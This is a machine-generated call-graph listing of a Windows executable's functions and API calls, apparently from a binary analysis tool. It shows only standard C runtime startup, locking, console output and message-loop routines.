8119->8165 8124 fe17a3 8123->8124 8178 fe1d35 IsProcessorFeaturePresent 8124->8178 8128 fe17b4 8129 fe17b8 8128->8129 8188 fe5623 8128->8188 8129->8100 8132 fe17cf 8132->8100 8313 fe22f0 8134->8313 8137 fe1bcf 8137->8111 8139 fe10de 8138->8139 8140 fe10f0 ShowWindow KiUserCallbackDispatcher LoadAcceleratorsW KiUserCallbackDispatcher 8138->8140 8141 fe13a9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 8139->8141 8142 fe1123 8140->8142 8143 fe1160 8140->8143 8144 fe10ea 8141->8144 8145 fe1130 TranslateAcceleratorW 8142->8145 8146 fe13a9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 8143->8146 8144->8115 8148 fe1144 TranslateMessage DispatchMessageW 8145->8148 8149 fe1150 GetMessageW 8145->8149 8147 fe1170 8146->8147 8147->8115 8148->8149 8149->8143 8149->8145 8315 fe4e89 8150->8315 8154 fe5045 _unexpected 8153->8154 8155 fe56c4 ___scrt_is_nonwritable_in_current_image 8153->8155 8154->8109 8388 fe6e63 GetLastError 8155->8388 8161 fe157b 8160->8161 8161->8103 8161->8118 8163 fe4e89 __FrameHandler3::FrameUnwindToState 21 API calls 8162->8163 8164 fe5015 8163->8164 8164->8119 8166 fe1917 8165->8166 8170 fe1590 8166->8170 8703 fe5635 8166->8703 8168 fe1925 8169 fe20dd ___scrt_uninitialize_crt 7 API calls 8168->8169 8169->8170 8170->8108 8172 fe1aa4 __FrameHandler3::FrameUnwindToState 8171->8172 8173 fe1b4f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8172->8173 8174 fe1b9a __FrameHandler3::FrameUnwindToState 8173->8174 8174->8103 8175 fe5019 8176 fe4e89 __FrameHandler3::FrameUnwindToState 21 API calls 8175->8176 8177 fe15f7 8176->8177 8179 fe17af 8178->8179 8180 fe20be 8179->8180 8197 fe26f1 8180->8197 8183 fe20c7 8183->8128 8185 fe20cf 8186 fe20da 8185->8186 8211 fe272d 8185->8211 8186->8128 8251 fe9908 8188->8251 8191 fe20dd 8192 fe20e6 8191->8192 8193 fe20f0 8191->8193 8194 fe26d6 ___vcrt_uninitialize_ptd 6 API calls 8192->8194 8193->8129 8195 fe20eb 8194->8195 8196 fe272d ___vcrt_uninitialize_locks DeleteCriticalSection 8195->8196 8196->8193 8198 fe26fa 8197->8198 8200 fe2723 8198->8200 8201 fe20c3 8198->8201 8215 fe296d 8198->8215 8202 fe272d ___vcrt_uninitialize_locks DeleteCriticalSection 8200->8202 8201->8183 8203 fe26a3 8201->8203 8202->8201 8232 fe287e 8203->8232 8206 fe26b8 8206->8185 8209 fe26d3 8209->8185 8212 fe2757 8211->8212 8213 fe2738 8211->8213 8212->8183 8214 fe2742 DeleteCriticalSection 8213->8214 8214->8212 8214->8214 8220 fe2793 8215->8220 8218 fe29a5 InitializeCriticalSectionAndSpinCount 8219 fe2990 8218->8219 8219->8198 8221 fe27b0 8220->8221 8224 fe27b4 8220->8224 8221->8218 8221->8219 8222 fe281c GetProcAddress 8222->8221 8224->8221 8224->8222 8225 fe280d 8224->8225 8227 fe2833 LoadLibraryExW 8224->8227 8225->8222 8226 fe2815 FreeLibrary 8225->8226 8226->8222 8228 fe287a 8227->8228 8229 fe284a GetLastError 8227->8229 8228->8224 8229->8228 8230 fe2855 8229->8230 8230->8228 8231 fe286b LoadLibraryExW 8230->8231 8231->8224 8233 fe2793 ___vcrt_FlsSetValue 5 API calls 8232->8233 8234 fe2898 8233->8234 8235 fe28b1 TlsAlloc 8234->8235 8236 fe26ad 8234->8236 8236->8206 8237 fe292f 8236->8237 8238 fe2793 ___vcrt_FlsSetValue 5 API calls 8237->8238 8239 fe2949 8238->8239 8240 fe2964 TlsSetValue 8239->8240 8241 fe26c6 8239->8241 8240->8241 8241->8209 8242 fe26d6 8241->8242 8243 fe26e6 8242->8243 8244 fe26e0 8242->8244 8243->8206 8246 fe28b9 8244->8246 8247 fe2793 ___vcrt_FlsSetValue 5 API calls 8246->8247 8248 fe28d3 8247->8248 8249 fe28eb TlsFree 8248->8249 8250 fe28df 8248->8250 8249->8250 8250->8243 8252 fe9918 8251->8252 8253 fe17c1 8251->8253 8252->8253 8255 fe8b97 8252->8255 8253->8132 8253->8191 8256 fe8ba3 ___scrt_is_nonwritable_in_current_image 8255->8256 8267 fe86e1 EnterCriticalSection 8256->8267 8258 fe8baa 8268 fe883c 8258->8268 8261 fe8bc8 8292 fe8bee 8261->8292 8267->8258 8269 fe8848 ___scrt_is_nonwritable_in_current_image 8268->8269 8270 fe8872 8269->8270 8271 fe8851 8269->8271 8295 fe86e1 EnterCriticalSection 8270->8295 8272 fe5d38 __dosmaperr 14 API calls 8271->8272 8274 fe8856 8272->8274 8275 fe5c57 ___std_exception_copy 29 API calls 8274->8275 8276 fe8860 8275->8276 8276->8261 8281 fe8a31 GetStartupInfoW 8276->8281 8277 fe88aa 8303 fe88d1 8277->8303 8279 fe887e 8279->8277 8296 fe878c 8279->8296 8282 fe8a4e 8281->8282 8283 fe8ae2 8281->8283 8282->8283 8284 fe883c 30 API calls 8282->8284 8287 fe8ae7 8283->8287 8285 fe8a76 8284->8285 8285->8283 8286 fe8aa6 GetFileType 8285->8286 8286->8285 8289 fe8aee 8287->8289 8288 fe8b31 GetStdHandle 8288->8289 8289->8288 8290 fe8b93 8289->8290 8291 fe8b44 GetFileType 8289->8291 8290->8261 8291->8289 8312 fe8729 LeaveCriticalSection 8292->8312 8294 fe8bd9 8294->8252 8295->8279 8297 fe728b _unexpected 14 API calls 8296->8297 8299 fe879e 8297->8299 8298 fe87ab 8300 fe5d4b __freea 14 API calls 8298->8300 8299->8298 8306 fe975d 8299->8306 8302 fe8800 8300->8302 8302->8279 8311 fe8729 LeaveCriticalSection 8303->8311 8305 fe88d8 8305->8276 8307 fe951d _unexpected 5 API calls 8306->8307 8308 fe9779 8307->8308 8309 fe9797 InitializeCriticalSectionAndSpinCount 8308->8309 8310 fe9782 8308->8310 8309->8310 8310->8299 8311->8305 8312->8294 8314 fe1bbc GetStartupInfoW 8313->8314 8314->8137 8316 fe4ec8 8315->8316 8317 fe4eb6 8315->8317 8327 fe4d39 8316->8327 8319 fe1bdf __FrameHandler3::FrameUnwindToState GetModuleHandleW 8317->8319 8321 fe4ebb 8319->8321 8321->8316 8342 fe4f6a GetModuleHandleExW 8321->8342 8322 fe15ef 8322->8175 8326 fe4f1a 8328 fe4d45 ___scrt_is_nonwritable_in_current_image 8327->8328 8348 fe86e1 EnterCriticalSection 8328->8348 8330 fe4d4f 8349 fe4da1 8330->8349 8332 fe4d5c 8353 fe4d7a 8332->8353 8335 fe4f20 8378 fe4f51 8335->8378 8337 fe4f2a 8338 fe4f3e 8337->8338 8339 fe4f2e GetCurrentProcess TerminateProcess 8337->8339 8340 fe4f6a __FrameHandler3::FrameUnwindToState 3 API calls 8338->8340 8339->8338 8341 fe4f46 ExitProcess 8340->8341 8343 fe4fca 8342->8343 8344 fe4fa9 GetProcAddress 8342->8344 8345 fe4ec7 8343->8345 8346 fe4fd0 FreeLibrary 8343->8346 8344->8343 8347 fe4fbd 8344->8347 8345->8316 8346->8345 8347->8343 8348->8330 8351 fe4dad ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState 8349->8351 8350 fe4e11 __FrameHandler3::FrameUnwindToState 8350->8332 8351->8350 8356 fe548e 8351->8356 8377 fe8729 LeaveCriticalSection 8353->8377 8355 fe4d68 8355->8322 8355->8335 8357 fe549a __EH_prolog3 8356->8357 8360 fe51e6 8357->8360 8359 fe54c1 __FrameHandler3::FrameUnwindToState 8359->8350 8361 fe51f2 ___scrt_is_nonwritable_in_current_image 8360->8361 8368 fe86e1 EnterCriticalSection 8361->8368 8363 fe5200 8369 fe539e 8363->8369 8368->8363 8370 fe53bd 8369->8370 8371 fe520d 8369->8371 8370->8371 8372 fe5d4b __freea 14 API calls 8370->8372 8373 fe5235 8371->8373 8372->8371 8376 fe8729 LeaveCriticalSection 8373->8376 8375 fe521e 8375->8359 8376->8375 8377->8355 8381 fe8765 8378->8381 8380 fe4f56 __FrameHandler3::FrameUnwindToState 8380->8337 8382 fe8774 __FrameHandler3::FrameUnwindToState 8381->8382 8383 fe8781 8382->8383 8385 fe95a2 8382->8385 8383->8380 8386 fe951d _unexpected 5 API calls 8385->8386 8387 fe95be 8386->8387 8387->8383 8389 fe6e79 8388->8389 8390 fe6e7f 8388->8390 8392 fe96dc _unexpected 6 API calls 8389->8392 8391 fe971b _unexpected 6 API calls 8390->8391 8394 fe6e83 SetLastError 8390->8394 8393 fe6e9b 8391->8393 8392->8390 8393->8394 8396 fe728b _unexpected 14 API calls 8393->8396 8398 fe6f18 8394->8398 8399 fe56d5 8394->8399 8397 fe6eb0 8396->8397 8400 fe6eb8 8397->8400 8401 fe6ec9 8397->8401 8402 fe5780 __FrameHandler3::FrameUnwindToState 66 API calls 8398->8402 8415 fe5780 8399->8415 8403 fe971b _unexpected 6 API calls 8400->8403 8404 fe971b _unexpected 6 API calls 8401->8404 8405 fe6f1d 8402->8405 8413 fe6ec6 8403->8413 8406 fe6ed5 8404->8406 8407 fe6ed9 8406->8407 8408 fe6ef0 8406->8408 8411 fe971b _unexpected 6 API calls 8407->8411 8410 fe6c91 _unexpected 14 API calls 8408->8410 8409 fe5d4b __freea 14 API calls 8409->8394 8412 fe6efb 8410->8412 8411->8413 8414 fe5d4b __freea 14 API calls 8412->8414 8413->8409 8414->8394 8426 fe9b05 8415->8426 8418 fe5790 8420 fe579a IsProcessorFeaturePresent 8418->8420 8425 fe57b9 8418->8425 8422 fe57a6 8420->8422 8421 fe5019 __FrameHandler3::FrameUnwindToState 21 API calls 8424 fe57c3 8421->8424 8423 fe5a5b __FrameHandler3::FrameUnwindToState 8 API calls 8422->8423 8423->8425 8425->8421 8462 fe9a33 8426->8462 8429 fe9b4a 8434 fe9b56 ___scrt_is_nonwritable_in_current_image 8429->8434 8430 fe6fb4 __dosmaperr 14 API calls 8438 fe9b87 __FrameHandler3::FrameUnwindToState 8430->8438 8431 fe9ba6 8433 fe5d38 __dosmaperr 14 API calls 8431->8433 8432 fe9bb8 __FrameHandler3::FrameUnwindToState 8435 fe9bee __FrameHandler3::FrameUnwindToState 8432->8435 8473 fe86e1 EnterCriticalSection 8432->8473 8436 fe9bab 8433->8436 8434->8430 8434->8431 8434->8432 8434->8438 8442 fe9c2b 8435->8442 8443 fe9d28 8435->8443 8452 fe9c59 8435->8452 8439 fe5c57 ___std_exception_copy 29 API calls 8436->8439 8438->8431 8438->8432 8440 fe9b90 8438->8440 8439->8440 8440->8418 8448 fe6e63 _unexpected 68 API calls 8442->8448 8442->8452 8444 fe9d33 8443->8444 8478 fe8729 LeaveCriticalSection 8443->8478 8447 fe5019 __FrameHandler3::FrameUnwindToState 21 API calls 8444->8447 8453 fe9d3b ___scrt_is_nonwritable_in_current_image 8447->8453 8449 fe9c4e 8448->8449 8451 fe6e63 _unexpected 68 API calls 8449->8451 8450 fe6e63 _unexpected 68 API calls 8455 fe9cae 8450->8455 8451->8452 8474 fe9cd4 8452->8474 8479 fea100 EnterCriticalSection 8453->8479 8455->8440 8456 fe6e63 _unexpected 68 API calls 8455->8456 8456->8440 8457 fe9d8b 8491 fe9dbc 8457->8491 8458 fe9d52 __FrameHandler3::FrameUnwindToState 8458->8457 8480 fe9f7e 8458->8480 8463 fe9a3f ___scrt_is_nonwritable_in_current_image 8462->8463 8468 fe86e1 EnterCriticalSection 8463->8468 8465 fe9a4d 8469 fe9a8f 8465->8469 8468->8465 8472 fe8729 LeaveCriticalSection 8469->8472 8471 fe5785 8471->8418 8471->8429 8472->8471 8473->8435 8475 fe9cd8 8474->8475 8476 fe9ca0 8474->8476 8494 fe8729 LeaveCriticalSection 8475->8494 8476->8440 8476->8450 8476->8455 8478->8444 8479->8458 8481 fe9f93 __FrameHandler3::FrameUnwindToState 8480->8481 8482 fe9f9a 8481->8482 8483 fe9fa5 8481->8483 8495 fe9e74 8482->8495 8498 fe9f15 8483->8498 8487 fe9fa0 __FrameHandler3::FrameUnwindToState 8487->8457 8489 fe9fc6 8511 feb8b5 8489->8511 8702 fea114 LeaveCriticalSection 8491->8702 8493 fe9daa 8493->8418 8494->8476 8522 fe9dc8 8495->8522 8499 fe9f2e 8498->8499 8503 fe9f55 8498->8503 8500 fea75d __FrameHandler3::FrameUnwindToState 29 API calls 8499->8500 8499->8503 8501 fe9f4a 8500->8501 8544 fec0d4 8501->8544 8503->8487 8504 fea75d 8503->8504 8505 fea77e 8504->8505 8506 fea769 8504->8506 8505->8489 8507 fe5d38 __dosmaperr 14 API calls 8506->8507 8508 fea76e 8507->8508 8509 fe5c57 ___std_exception_copy 29 API calls 8508->8509 8510 fea779 8509->8510 8510->8489 8512 feb8c6 8511->8512 8515 feb8d3 8511->8515 8513 fe5d38 __dosmaperr 14 API calls 8512->8513 8521 feb8cb 8513->8521 8514 feb91c 8516 fe5d38 __dosmaperr 14 API calls 8514->8516 8515->8514 8517 feb8fa 8515->8517 8518 feb921 8516->8518 8681 feb813 8517->8681 8519 fe5c57 ___std_exception_copy 29 API calls 8518->8519 8519->8521 8521->8487 8523 fe9dd4 ___scrt_is_nonwritable_in_current_image 8522->8523 8530 fe86e1 EnterCriticalSection 8523->8530 8525 fe9e4a 8539 fe9e68 8525->8539 8526 fe9dde __FrameHandler3::FrameUnwindToState 8526->8525 8531 fe9d3c 8526->8531 8530->8526 8532 fe9d48 ___scrt_is_nonwritable_in_current_image 8531->8532 8542 fea100 EnterCriticalSection 8532->8542 8534 fe9d52 __FrameHandler3::FrameUnwindToState 8536 fe9f7e __FrameHandler3::FrameUnwindToState 68 API calls 8534->8536 8538 fe9d8b 8534->8538 8535 fe9dbc __FrameHandler3::FrameUnwindToState LeaveCriticalSection 8537 fe9daa 8535->8537 8536->8538 8537->8526 8538->8535 8543 fe8729 LeaveCriticalSection 8539->8543 8541 fe9e56 8541->8487 8542->8534 8543->8541 8545 fec0e0 ___scrt_is_nonwritable_in_current_image 8544->8545 8546 fec121 8545->8546 8548 fec167 8545->8548 8554 fec0e8 8545->8554 8547 fe5bda ___std_exception_copy 29 API calls 8546->8547 8547->8554 8555 fe88da EnterCriticalSection 8548->8555 8550 fec16d 8551 fec18b 8550->8551 8556 fec1e5 8550->8556 8582 fec1dd 8551->8582 8554->8503 8555->8550 8557 fec20d 8556->8557 8580 fec230 __FrameHandler3::FrameUnwindToState 8556->8580 8558 fec211 8557->8558 8560 fec26c 8557->8560 8559 fe5bda ___std_exception_copy 29 API calls 8558->8559 8559->8580 8561 fec28a 8560->8561 8585 fecca6 8560->8585 8588 febd61 8561->8588 8565 fec2e9 8567 fec2fd 8565->8567 8568 fec352 WriteFile 8565->8568 8566 fec2a2 8569 fec2aa 8566->8569 8570 fec2d1 8566->8570 8571 fec33e 8567->8571 8572 fec305 8567->8572 8573 fec374 GetLastError 8568->8573 8568->8580 8569->8580 8595 febcf9 8569->8595 8600 feb932 GetConsoleOutputCP 8570->8600 8628 febdde 8571->8628 8575 fec32a 8572->8575 8576 fec30a 8572->8576 8573->8580 8620 febfa2 8575->8620 8576->8580 8613 febeb9 8576->8613 8580->8551 8680 fe88fd LeaveCriticalSection 8582->8680 8584 fec1e3 8584->8554 8635 fecc23 8585->8635 8587 feccbf 8587->8561 8654 fec4ec 8588->8654 8590 febdd7 8590->8565 8590->8566 8591 febd73 8591->8590 8592 febda1 8591->8592 8663 fe5920 8591->8663 8592->8590 8594 febdbb GetConsoleMode 8592->8594 8594->8590 8598 febd50 8595->8598 8599 febd1b 8595->8599 8596 feccc4 5 API calls __FrameHandler3::FrameUnwindToState 8596->8599 8597 febd52 GetLastError 8597->8598 8598->8580 8599->8596 8599->8597 8599->8598 8601 feb9a4 8600->8601 8606 feb9ab __InternalCxxFrameHandler 8600->8606 8602 fe5920 __FrameHandler3::FrameUnwindToState 64 API calls 8601->8602 8602->8606 8603 fe13a9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 8604 febcf2 8603->8604 8604->8580 8605 fea62a 64 API calls __FrameHandler3::FrameUnwindToState 8605->8606 8606->8605 8607 febc61 8606->8607 8609 febbda WriteFile 8606->8609 8611 fec6e2 5 API calls __FrameHandler3::FrameUnwindToState 8606->8611 8612 febc18 WriteFile 8606->8612 8677 fe8185 8606->8677 8607->8603 8607->8607 8609->8606 8610 febcd0 GetLastError 8609->8610 8610->8607 8611->8606 8612->8606 8612->8610 8616 febec8 __FrameHandler3::FrameUnwindToState 8613->8616 8614 febf87 8617 fe13a9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 8614->8617 8615 febf3d WriteFile 8615->8616 8618 febf89 GetLastError 8615->8618 8616->8614 8616->8615 8619 febfa0 8617->8619 8618->8614 8619->8580 8622 febfb1 __FrameHandler3::FrameUnwindToState 8620->8622 8621 fe13a9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 8623 fec0d2 8621->8623 8624 fe8185 __FrameHandler3::FrameUnwindToState WideCharToMultiByte 8622->8624 8625 fec0bb GetLastError 8622->8625 8626 fec070 WriteFile 8622->8626 8627 fec0b9 8622->8627 8623->8580 8624->8622 8625->8627 8626->8622 8626->8625 8627->8621 8633 febded __FrameHandler3::FrameUnwindToState 8628->8633 8629 febe9e 8630 fe13a9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 8629->8630 8631 febeb7 8630->8631 8631->8580 8632 febe5d WriteFile 8632->8633 8634 febea0 GetLastError 8632->8634 8633->8629 8633->8632 8634->8629 8641 fe89b1 8635->8641 8637 fecc35 8638 fecc51 SetFilePointerEx 8637->8638 8640 fecc3d __FrameHandler3::FrameUnwindToState 8637->8640 8639 fecc69 GetLastError 8638->8639 8638->8640 8639->8640 8640->8587 8642 fe89be 8641->8642 8643 fe89d3 8641->8643 8644 fe5d25 __dosmaperr 14 API calls 8642->8644 8646 fe5d25 __dosmaperr 14 API calls 8643->8646 8649 fe89f8 8643->8649 8645 fe89c3 8644->8645 8648 fe5d38 __dosmaperr 14 API calls 8645->8648 8647 fe8a03 8646->8647 8650 fe5d38 __dosmaperr 14 API calls 8647->8650 8651 fe89cb 8648->8651 8649->8637 8652 fe8a0b 8650->8652 8651->8637 8653 fe5c57 ___std_exception_copy 29 API calls 8652->8653 8653->8651 8655 fec4f9 8654->8655 8656 fec506 8654->8656 8657 fe5d38 __dosmaperr 14 API calls 8655->8657 8658 fec512 8656->8658 8659 fe5d38 __dosmaperr 14 API calls 8656->8659 8660 fec4fe 8657->8660 8658->8591 8661 fec533 8659->8661 8660->8591 8662 fe5c57 ___std_exception_copy 29 API calls 8661->8662 8662->8660 8664 fe5930 8663->8664 8669 fea59b 8664->8669 8670 fea5b2 8669->8670 8672 fe594d 8669->8672 8671 fe9319 __FrameHandler3::FrameUnwindToState 68 API calls 8670->8671 8670->8672 8671->8672 8673 fea5f9 8672->8673 8674 fe595a 8673->8674 8675 fea610 8673->8675 8674->8592 8675->8674 8676 fe7d81 __FrameHandler3::FrameUnwindToState 68 API calls 8675->8676 8676->8674 8678 fe8198 __FrameHandler3::FrameUnwindToState 8677->8678 8679 fe81d6 WideCharToMultiByte 8678->8679 8679->8606 8680->8584 8682 feb81f ___scrt_is_nonwritable_in_current_image 8681->8682 8694 fe88da EnterCriticalSection 8682->8694 8684 feb82e 8686 fe89b1 __FrameHandler3::FrameUnwindToState 29 API calls 8684->8686 8692 feb873 8684->8692 8685 fe5d38 __dosmaperr 14 API calls 8688 feb87a 8685->8688 8687 feb85a FlushFileBuffers 8686->8687 8687->8688 8689 feb866 GetLastError 8687->8689 8698 feb8a9 8688->8698 8695 fe5d25 8689->8695 8692->8685 8694->8684 8696 fe6fb4 __dosmaperr 14 API calls 8695->8696 8697 fe5d2a 8696->8697 8697->8692 8701 fe88fd LeaveCriticalSection 8698->8701 8700 feb892 8700->8521 8701->8700 8702->8493 8704 fe5652 ___scrt_uninitialize_crt 8703->8704 8705 fe5640 8703->8705 8704->8168 8706 fe564e 8705->8706 8708 fe9fe3 8705->8708 8706->8168 8709 fe9e74 ___scrt_uninitialize_crt 68 API calls 8708->8709 8710 fe9fea 8709->8710 8710->8706 10137 fe4878 10138 fe4881 10137->10138 10141 fe4897 10137->10141 10138->10141 10143 fe48a4 10138->10143 10140 fe488e 10140->10141 10160 fe4b82 10140->10160 10144 fe48ad 10143->10144 10145 fe48b0 10143->10145 10144->10140 10168 fe7d39 10145->10168 10148 fe8228 20 API calls 10149 fe48bb 10148->10149 10150 fe48cd 10149->10150 10151 fe48c1 10149->10151 10174 fe4953 10150->10174 10152 fe5d4b __freea 14 API calls 10151->10152 10154 fe48c7 10152->10154 10154->10140 10156 fe5d4b __freea 14 API calls 10157 fe48f1 10156->10157 10158 fe5d4b __freea 14 API calls 10157->10158 10159 fe48f7 10158->10159 10159->10140 10161 fe4bf3 10160->10161 10166 fe4b91 10160->10166 10161->10141 10162 fe8185 WideCharToMultiByte __FrameHandler3::FrameUnwindToState 10162->10166 10163 fe728b _unexpected 14 API calls 10163->10166 10164 fe4bf7 10165 fe5d4b __freea 14 API calls 10164->10165 10165->10161 10166->10161 10166->10162 10166->10163 10166->10164 10167 fe5d4b __freea 14 API calls 10166->10167 10167->10166 10169 fe7d42 10168->10169 10173 fe48b6 10168->10173 10196 fe6f1e 10169->10196 10173->10148 10177 fe4968 10174->10177 10175 fe728b _unexpected 14 API calls 10176 fe498f 10175->10176 10178 fe4997 10176->10178 10187 fe49a1 10176->10187 10177->10175 10179 fe5d4b __freea 14 API calls 10178->10179 10195 fe48d4 10179->10195 10180 fe49fe 10181 fe5d4b __freea 14 API calls 10180->10181 10181->10195 10182 fe728b _unexpected 14 API calls 10182->10187 10183 fe4a0d 10184 fe4b53 14 API calls 10183->10184 10186 fe4a13 10184->10186 10185 fe5726 ___std_exception_copy 29 API calls 10185->10187 10188 fe5d4b __freea 14 API calls 10186->10188 10187->10180 10187->10182 10187->10183 10187->10185 10189 fe4a28 10187->10189 10191 fe5d4b __freea 14 API calls 10187->10191 10190 fe4a1a 10188->10190 10192 fe5c67 ___std_exception_copy 11 API calls 10189->10192 10193 fe5d4b __freea 14 API calls 10190->10193 10191->10187 10194 fe4a34 10192->10194 10193->10195 10195->10156 10197 fe6f29 10196->10197 10200 fe6f2f 10196->10200 10198 fe96dc _unexpected 6 API calls 10197->10198 10198->10200 10199 fe971b _unexpected 6 API calls 10201 fe6f49 10199->10201 10200->10199 10202 fe6f35 10200->10202 10201->10202 10205 fe728b _unexpected 14 API calls 10201->10205 10203 fe5780 __FrameHandler3::FrameUnwindToState 68 API calls 10202->10203 10204 fe6f3a 10202->10204 10206 fe6fb3 10203->10206 10221 fe7b44 10204->10221 10207 fe6f59 10205->10207 10208 fe6f76 10207->10208 10209 fe6f61 10207->10209 10210 fe971b _unexpected 6 API calls 10208->10210 10211 fe971b _unexpected 6 API calls 10209->10211 10213 fe6f82 10210->10213 10212 fe6f6d 10211->10212 10216 fe5d4b __freea 14 API calls 10212->10216 10214 fe6f86 10213->10214 10215 fe6f95 10213->10215 10217 fe971b _unexpected 6 API calls 10214->10217 10218 fe6c91 _unexpected 14 API calls 10215->10218 10216->10202 10217->10212 10219 fe6fa0 10218->10219 10220 fe5d4b __freea 14 API calls 10219->10220 10220->10204 10222 fe7c99 __FrameHandler3::FrameUnwindToState 68 API calls 10221->10222 10223 fe7b6e 10222->10223 10244 fe78cb 10223->10244 10226 fe8e93 15 API calls 10227 fe7b98 10226->10227 10228 fe7bae 10227->10228 10229 fe7ba0 10227->10229 10251 fe7d94 10228->10251 10231 fe5d4b __freea 14 API calls 10229->10231 10233 fe7b87 10231->10233 10233->10173 10234 fe7be6 10235 fe5d38 __dosmaperr 14 API calls 10234->10235 10236 fe7beb 10235->10236 10239 fe5d4b __freea 14 API calls 10236->10239 10237 fe7c2d 10238 fe7c76 10237->10238 10262 fe77bd 10237->10262 10242 fe5d4b __freea 14 API calls 10238->10242 10239->10233 10240 fe7c01 10240->10237 10243 fe5d4b __freea 14 API calls 10240->10243 10242->10233 10243->10237 10245 fe697a 68 API calls 10244->10245 10246 fe78dd 10245->10246 10247 fe78fe 10246->10247 10248 fe78ec GetOEMCP 10246->10248 10249 fe7915 10247->10249 10250 fe7903 GetACP 10247->10250 10248->10249 10249->10226 10249->10233 10250->10249 10252 fe78cb 70 API calls 10251->10252 10253 fe7db4 10252->10253 10254 fe7eb9 10253->10254 10256 fe7df1 IsValidCodePage 10253->10256 10261 fe7e0c __FrameHandler3::FrameUnwindToState 10253->10261 10255 fe13a9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10254->10255 10257 fe7bdb 10255->10257 10256->10254 10258 fe7e03 10256->10258 10257->10234 10257->10240 10259 fe7e2c GetCPInfo 10258->10259 10258->10261 10259->10254 10259->10261 10270 fe799f 10261->10270 10263 fe77c9 ___scrt_is_nonwritable_in_current_image 10262->10263 10338 fe86e1 EnterCriticalSection 10263->10338 10265 fe77d3 10339 fe780a 10265->10339 10271 fe79c7 GetCPInfo 10270->10271 10280 fe7a90 10270->10280 10276 fe79df 10271->10276 10271->10280 10272 fe13a9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10274 fe7b42 10272->10274 10274->10254 10281 fe8f2f 10276->10281 10279 feb5bf 70 API calls 10279->10280 10280->10272 10282 fe697a 68 API calls 10281->10282 10283 fe8f4f 10282->10283 10284 fe80cb __FrameHandler3::FrameUnwindToState MultiByteToWideChar 10283->10284 10285 fe8f7c 10284->10285 10286 fe9003 10285->10286 10287 fe900b 10285->10287 10290 fe8e93 15 API calls 10285->10290 10292 fe8fa1 __FrameHandler3::FrameUnwindToState __alloca_probe_16 10285->10292 10289 fe9030 __freea 14 API calls 10286->10289 10288 fe13a9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10287->10288 10291 fe7a47 10288->10291 10289->10287 10290->10292 10296 feb5bf 10291->10296 10292->10286 10293 fe80cb __FrameHandler3::FrameUnwindToState MultiByteToWideChar 10292->10293 10294 fe8fea 10293->10294 10294->10286 10295 fe8ff1 GetStringTypeW 10294->10295 10295->10286 10297 fe697a 68 API calls 10296->10297 10298 feb5d2 10297->10298 10301 feb3d0 10298->10301 10302 feb3eb 10301->10302 10303 fe80cb __FrameHandler3::FrameUnwindToState MultiByteToWideChar 10302->10303 10306 feb42f 10303->10306 10304 feb5aa 10305 fe13a9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 10304->10305 10307 fe7a68 10305->10307 10306->10304 10308 fe8e93 15 API calls 10306->10308 10310 feb455 __alloca_probe_16 10306->10310 10322 feb4fd 10306->10322 10307->10279 10308->10310 10309 fe9030 __freea 14 API calls 10309->10304 10311 fe80cb __FrameHandler3::FrameUnwindToState MultiByteToWideChar 10310->10311 10310->10322 10312 feb49e 10311->10312 10312->10322 10329 fe97a8 10312->10329 10315 feb50c 10317 feb595 10315->10317 10318 feb51e __alloca_probe_16 10315->10318 10319 fe8e93 15 API calls 10315->10319 10316 feb4d4 10321 fe97a8 6 API calls 10316->10321 10316->10322 10320 fe9030 __freea 14 API calls 10317->10320 10318->10317 10323 fe97a8 6 API calls 10318->10323 10319->10318 10320->10322 10321->10322 10322->10309 10324 feb561 10323->10324 10324->10317 10325 fe8185 __FrameHandler3::FrameUnwindToState WideCharToMultiByte 10324->10325 10326 feb57b 10325->10326 10326->10317 10327 feb584 10326->10327 10328 fe9030 __freea 14 API calls 10327->10328 10328->10322 10335 fe941e 10329->10335 10332 fe9805 5 API calls 10333 fe97f9 LCMapStringW 10332->10333 10334 fe97b9 10333->10334 10334->10315 10334->10316 10334->10322 10336 fe951d _unexpected 5 API calls 10335->10336 10337 fe9434 10336->10337 10337->10332 10337->10334 10338->10265 10349 fe7f99 10339->10349 10341 fe782c 10342 fe7f99 29 API calls 10341->10342 10343 fe784b 10342->10343 10344 fe5d4b __freea 14 API calls 10343->10344 10345 fe77e0 10343->10345 10344->10345 10346 fe77fe 10345->10346 10363 fe8729 LeaveCriticalSection 10346->10363 10348 fe77ec 10348->10238 10350 fe7faa 10349->10350 10359 fe7fa6 __InternalCxxFrameHandler 10349->10359 10351 fe7fb1 10350->10351 10354 fe7fc4 __FrameHandler3::FrameUnwindToState 10350->10354 10352 fe5d38 __dosmaperr 14 API calls 10351->10352 10353 fe7fb6 10352->10353 10355 fe5c57 ___std_exception_copy 29 API calls 10353->10355 10356 fe7ffb 10354->10356 10357 fe7ff2 10354->10357 10354->10359 10355->10359 10356->10359 10361 fe5d38 __dosmaperr 14 API calls 10356->10361 10358 fe5d38 __dosmaperr 14 API calls 10357->10358 10360 fe7ff7 10358->10360 10359->10341 10362 fe5c57 ___std_exception_copy 29 API calls 10360->10362 10361->10360 10362->10359 10363->10348 8711 fe5f73 8712 fe5f9a 8711->8712 8713 fe5f82 8711->8713 8712->8713 8718 fe5fb1 _strrchr 8712->8718 8714 fe5d38 __dosmaperr 14 API calls 8713->8714 8715 fe5f87 8714->8715 8716 fe5c57 ___std_exception_copy 29 API calls 8715->8716 8736 fe5f92 8716->8736 8717 fe603c _strrchr 8719 fe605f 8717->8719 8720 fe608a 8717->8720 8718->8717 8724 fe728b _unexpected 14 API calls 8718->8724 8759 fe6ab3 8719->8759 8723 fe728b _unexpected 14 API calls 8720->8723 8722 fe6067 8725 fe6003 8722->8725 8726 fe6071 8722->8726 8727 fe60a6 8723->8727 8728 fe5ffb 8724->8728 8732 